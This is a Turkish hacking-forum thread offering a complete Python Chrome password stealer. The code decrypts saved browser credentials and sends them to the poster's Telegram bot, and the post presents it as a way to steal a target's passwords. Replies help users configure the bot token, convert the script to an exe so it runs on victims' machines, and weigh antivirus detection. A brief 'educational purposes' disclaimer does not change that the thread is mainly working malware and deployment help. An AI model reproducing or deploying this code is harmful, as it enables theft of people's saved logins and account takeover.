- 15 Mar 2022
- 81
- 21
Herhangi bir hata mesajı yok, çalıştırdım bu şekilde oldu, sorun şu telegram botuma bilgiler gelmiyor .txt dosyası olarak,chat ıd ve tokenide altta gerekli alana doğru yazdım.
Python ile Chrome Şifrelerini Çalmak!
- Konbuyu başlatan Mamilate
- Başlangıç tarihi
Herhangi bir hata mesajı yok, çalıştırdım bu şekilde oldu, sorun şu telegram botuma bilgiler gelmiyor .txt dosyası olarak,chat ıd ve tokenide altta gerekli alana doğru yazdım.
- 12 Kas 2023
- 174
- 72
İlginç. Exeye çevirme işleminde hata olsaydı terminalde belirtmesi gerekiyordu. Anlaşılan token ve chat id de bir yanlışlık var. Telegram Api için bot oluşturma / chatid oluşturma | Mikrotik Türkiye Eğitim & Ubiquiti Network Eğitim Merkezi şuraya bir göz atabilir misiniz?
Herhangi bir hata mesajı yok, çalıştırdım bu şekilde oldu, sorun şu telegram botuma bilgiler gelmiyor .txt dosyası olarak,chat ıd ve tokenide altta gerekli alana doğru yazdım.
elinize sağlık
- 15 Mar 2022
- 81
- 21
cevabınız için teşekkür ederim, Botfather ile bot oluşturdum Chat Id ve Tokni ordan aldığım gibi kopyaladım ve kodun içerisine 2 tırnak arasına yerleştirdim.
- 12 Kas 2023
- 174
- 72
- 15 Mar 2022
- 81
- 21
.exe dosyasına tıklıyorum dönüp bota bakıyorum hiç bir aksiyon yok, 4 tane bot oluşturdum denemeler yaptım olmuyor, kodlarda değiştirmem ve düzeltmeme geeken başka bir yer var mı atladığım. sadece chat ıd ve token bölümünü değiştiriyorum resimdeki gibi.
- 12 Kas 2023
- 174
- 72
Exe ye çevirmeden kodu çalıştırın, çalışıyorsa exeye çevirmede bir hata vardır. Çalışmıyorsa artık yapacak pek fazla bir şey yok dm gelebilirsin..exe dosyasına tıklıyorum dönüp bota bakıyorum hiç bir aksiyon yok, 4 tane bot oluşturdum denemeler yaptım olmuyor, kodlarda değiştirmem ve düzeltmeme geeken başka bir yer var mı atladığım. sadece chat ıd ve token bölümünü değiştiriyorum resimdeki gibi.
- 20 Şub 2022
- 1,313
- 331
Eline sağlık kardeşim
VT sonuçları varmı exe halinin?
VT sonuçları varmı exe halinin?
- 12 Kas 2023
- 174
- 72
TeşekkürlerEline sağlık kardeşim
VT sonuçları varmı exe halinin?
Vt de pythonun her türlü exe hali virüslü çıkar isterse sadece print yazdırmış olsun. Ama WD bu kodu algılamıyordu diye hatırlıyorum, istersen bir kontrol et.
dostum acayip beğendim bunu android telefonlara uygulama olarak kurup indirdikten sonra bir defa tıklayıp o kayıtlı şifreleride alabilirmiyiz nasıl mobil yapıcaz bilmiyorumda .py yi umarım yapılıyordun yardımcı olurmusun veya sen test ettinmi mobilde çalışıyormu.
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
- 20 Şub 2022
- 1,313
- 331
Mobilde yapamazsiniz sebebi chrome şifreleri root dizininde sakladığı için erisemezsin
- 12 Kas 2023
- 174
- 72
Evet maalesef arkadaşın dediği gibi root olması lazım telefonun. Ayriyeten ona göre de başka bir apk lazım bu kodla çalışmaz.
merhaba bu konularda yeniyim, telegram botu olsun tokenimiz olsun neyi nasıl yapcağım gram bilmiyorum yardımcı olur musunuz ?
- 12 Kas 2023
- 174
- 72
onları halledebildim, bilgisayarımda pythonun p si yok nasıl exe ye çevireceğim
- 12 Kas 2023
- 174
- 72
exeye çevirmek için ilk başta python yüklemen lazım, sonrasında ise pyinstaller yükleyerek talimatları uygulayıp exeye çevirebilirsin. exe ye çevirme işleminden sonra zaten kime gönderirsen gönder istersen hedefte python yüklü olmasın exe çalışır.
- 5 May 2020
- 43
- 21
Faydalı, emeğine sağlık
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
- 12 Kas 2023
- 174
- 72
Teşekkürler
- 13 Tem 2022
- 905
- 704
şifre çalmak derken bir adım ileri gidip bütün kodu çalmışsınız sanırım
birebir aynı. kaynakça belirtmemişsiniz
birebir aynı. kaynakça belirtmemişsiniz
